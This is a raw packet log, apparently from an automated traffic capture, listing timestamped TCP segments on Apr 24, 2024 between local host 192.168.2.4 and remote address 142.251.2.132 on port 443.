                                                                            Apr 24, 2024 10:12:01.554301023 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.554313898 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.566191912 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.566253901 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.566262007 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.578620911 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.578665972 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.578778028 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.578788042 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.578840971 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.591331959 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.602967024 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.603054047 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.603091002 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.603106022 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.603148937 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.615103006 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.627203941 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.627260923 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.627269030 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.633505106 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.633562088 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.633568048 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.649148941 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.649230003 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.649236917 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.673685074 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.673753977 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.673760891 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.678648949 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.678709984 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.678716898 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.688478947 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.688627958 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.688636065 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.697128057 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.697181940 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.697189093 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.705796003 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.705887079 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.705916882 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.714348078 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.714446068 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.714474916 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.722866058 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.722966909 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.722987890 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.731455088 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.731645107 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.731654882 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.739876032 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.739952087 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.739969969 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.748382092 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.748450994 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.748461008 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.761102915 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.761187077 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.761187077 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.761219025 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.761262894 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.769660950 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.778265953 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.778309107 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.778356075 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.778367996 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.778407097 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.786674976 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.795176029 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.795217037 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.795310974 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.795330048 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.795375109 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.803356886 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.810633898 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.810713053 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.810714960 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.810739994 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.810779095 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.818094015 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.825584888 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.825664043 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.825674057 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.833146095 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.833230019 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.833231926 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.833255053 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.833297014 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.840190887 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.847431898 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.847502947 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.847512960 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.854677916 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.854736090 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.854743004 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.858961105 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.859016895 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.859024048 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.866309881 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.866372108 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.866379023 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.873281956 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.873354912 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.873362064 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.877388954 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.877446890 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.877458096 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.884658098 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.884712934 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.884721041 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.888505936 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.888561010 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.888569117 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.890621901 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.890671968 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.890678883 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.894988060 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.895036936 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.895042896 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.900836945 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.900899887 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.900907040 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.903383017 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.903440952 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.903448105 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.907274008 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.907337904 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.907346010 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.911358118 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.911407948 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.911413908 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.918621063 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.918694973 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.918703079 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.921715021 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.921772957 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.921780109 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.929568052 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.929657936 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.929666042 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.930305004 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.930354118 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.930361032 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.935965061 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.936031103 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.936041117 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.938636065 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.938690901 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.938698053 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.942493916 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.942543030 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.942549944 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.947284937 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.947338104 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.947344065 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.949541092 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.949618101 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.949625015 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.953020096 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.953107119 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.953114986 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.956710100 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.956779957 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.956789017 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.960374117 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.960419893 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.960428953 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.964334965 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.964397907 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.964405060 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.968272924 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.968388081 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.968394995 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.970068932 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.970133066 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.970140934 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.974409103 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.974483967 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.974490881 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.977602959 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.977650881 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.977658987 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.981400967 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.981451988 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.981457949 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.984183073 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.984237909 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.984245062 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.988049984 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.988095999 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.988106966 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.991520882 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.991580963 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.991588116 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.994841099 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.994891882 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.994898081 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.998682976 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.998739004 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.998745918 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.002264977 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.002314091 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.002320051 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.005085945 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.005141020 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.005146980 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.010338068 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.010423899 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.010507107 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.010514021 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.010546923 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.013374090 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.017896891 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.017955065 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.017962933 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.021011114 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.021056890 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.021169901 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.021177053 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.021223068 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.023355961 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.028959036 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.029016018 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.029023886 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.030560017 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.030615091 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.030621052 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.032748938 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.032807112 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.032820940 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.032829046 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.032869101 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.036640882 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.039573908 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.039640903 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.039649963 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.041949034 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.042015076 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.042021036 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.045039892 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.045104027 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.045111895 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.048064947 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.048116922 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.048124075 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.050446987 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.050504923 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.050513029 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.052666903 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.052737951 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.052747011 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.055697918 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.055757046 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.055766106 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.058737993 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.058796883 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.058804035 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.061319113 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.061371088 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.061378002 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.064490080 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.064539909 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.064547062 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.067339897 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.067398071 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.067406893 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.069638968 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.069698095 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.069708109 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.073393106 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.073442936 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.073451996 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.075031042 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.075076103 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.075082064 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.077588081 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.077642918 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.077650070 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.082415104 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.082463026 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.082469940 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.085478067 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.085525036 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.085530996 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.086316109 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.086363077 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.086369038 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.088916063 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.088964939 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.088972092 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.091734886 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.091787100 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.091795921 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.094434023 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.094494104 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.094502926 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.095912933 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.095967054 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.095976114 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.098893881 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.098958015 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.098964930 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.100564003 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.100630999 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.100636005 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.103135109 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.103192091 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.103198051 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.105210066 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.105246067 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.105249882 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.107809067 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.107846022 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.107851028 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.110049963 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.110131025 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.110135078 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.112040997 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.112078905 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.112085104 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.114265919 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.114310026 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.114316940 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.117445946 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.117499113 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.117505074 CEST44349731142.251.2.132192.168.2.4
